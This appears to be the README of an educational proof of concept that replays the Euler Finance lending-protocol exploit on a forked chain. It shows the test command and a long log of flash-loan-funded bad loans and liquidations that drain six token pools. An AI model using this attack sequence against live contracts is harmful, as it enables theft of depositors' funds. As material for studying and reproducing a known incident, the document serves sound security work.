Awesome
Euler Exploit PoC
This is an educational proof-of-concept for the vulnerability in a Euler contract. The exploit closely replicates reverse engineered contract 0x036cec1a199234fc02f72d29e596a09440825f1c.
Proudly using Immunefi's Forge PoC Templates
Requirements
Run
Run test as follows:
% forge test --match-path test/pocs/EulerHack.t.sol -vvv
[⠆] Compiling...
[⠊] Compiling 52 files with 0.8.17
[⠰] Solc 0.8.17 finished in 4.87s
Compiler run successful (with warnings)
Running 1 test for test/pocs/EulerHack.t.sol:EulerHackTest
[PASS] testFlashLoan() (gas: 17687653)
Logs:
[*] Forking chain before the attack at 16817995
[*] Attacking USDC...
[*] Euler balance before exploit: 34413863 USDC
[*] Borrowing 210000000 USDC
>>> Taking flashloan of 210000000000000 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48 from FlashLoanProviders[2]
>>> Execute attack
[*] Generated bad loan...
Collateral: 2158641630 Debt: 2730000000
[*] Liquidated bad loan...
Collateral: 2158641630 Debt: 1811583362 Profit: 347058268
[*] Stealing 34413863 USDC from Euler pool
>>> Attack completed successfully
>>> Pay back flash loan
[*] Attacker balance after exploit: 34224863 USDC
[*] Attacking WBTC...
[*] Euler balance before exploit: 849 WBTC
[*] Borrowing 3000 WBTC
>>> Taking flashloan of 300000000000 0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599 from FlashLoanProviders[2]
>>> Execute attack
[*] Generated bad loan...
Collateral: 31483 Debt: 39000
[*] Liquidated bad loan...
Collateral: 31483 Debt: 26010 Profit: 5473
[*] Stealing 849 WBTC from Euler pool
>>> Attack completed successfully
>>> Pay back flash loan
[*] Attacker balance after exploit: 846 WBTC
[*] Attacking WETH...
[*] Euler balance before exploit: 8099 WETH
[*] Borrowing 20895 WETH
>>> Taking flashloan of 20895000000000000000000 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 from FlashLoanProviders[2]
>>> Execute attack
[*] Generated bad loan...
Collateral: 215261 Debt: 271635
[*] Liquidated bad loan...
Collateral: 215261 Debt: 180350 Profit: 34911
[*] Stealing 8099 WETH from Euler pool
>>> Attack completed successfully
>>> Pay back flash loan
[*] Attacker balance after exploit: 8080 WETH
[*] Attacking stETH...
[*] Euler balance before exploit: 3897 stETH
[*] Borrowing 20895 stETH
>>> Taking flashloan of 20895000000000000000000 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84 from FlashLoanProviders[2]
>>> Execute attack
[*] Generated bad loan...
Collateral: 212549 Debt: 271635
[*] Liquidated bad loan...
Collateral: 212549 Debt: 179789 Profit: 32760
[*] Stealing 3897 stETH from Euler pool
>>> Attack completed successfully
>>> Pay back flash loan
[*] Attacker balance after exploit: 3878 stETH
[*] Attacking DAI...
[*] Euler balance before exploit: 8904507 DAI
[*] Borrowing 30000000 DAI
>>> Taking flashloan of 30000000000000000000000000 0x6B175474E89094C44Da98b954EedeAC495271d0F from FlashLoanProviders[2]
>>> Execute attack
[*] Generated bad loan...
Collateral: 310930612 Debt: 390000000
[*] Liquidated bad loan...
Collateral: 310930612 Debt: 259319058 Profit: 51611554
[*] Stealing 8904507 DAI from Euler pool
>>> Attack completed successfully
>>> Pay back flash loan
[*] Attacker balance after exploit: 8877507 DAI
[*] Attacking wstETH...
[*] Euler balance before exploit: 66271 wstETH
[*] Borrowing 99000 wstETH
>>> Taking flashloan of 99000000000000000000000 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0 from FlashLoanProviders[4]
>>> Execute attack
[*] Generated bad loan...
Collateral: 1040313 Debt: 1287000
[*] Liquidated bad loan...
Collateral: 1040313 Debt: 858613 Profit: 181700
[*] Stealing 46200 wstETH from Euler pool
>>> Attack completed successfully
>>> Pay back flash loan
[*] Borrowing 99000 wstETH
>>> Taking flashloan of 99000000000000000000000 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0 from FlashLoanProviders[4]
>>> Execute attack
[*] Generated bad loan...
Collateral: 1040313 Debt: 1287000
[*] Liquidated bad loan...
Collateral: 1040313 Debt: 858613 Profit: 181700
[*] Stealing 20071 wstETH from Euler pool
>>> Attack completed successfully
>>> Pay back flash loan
[*] Attacker balance after exploit: 66271 wstETH
Test result: ok. 1 passed; 0 failed; finished in 332.89ms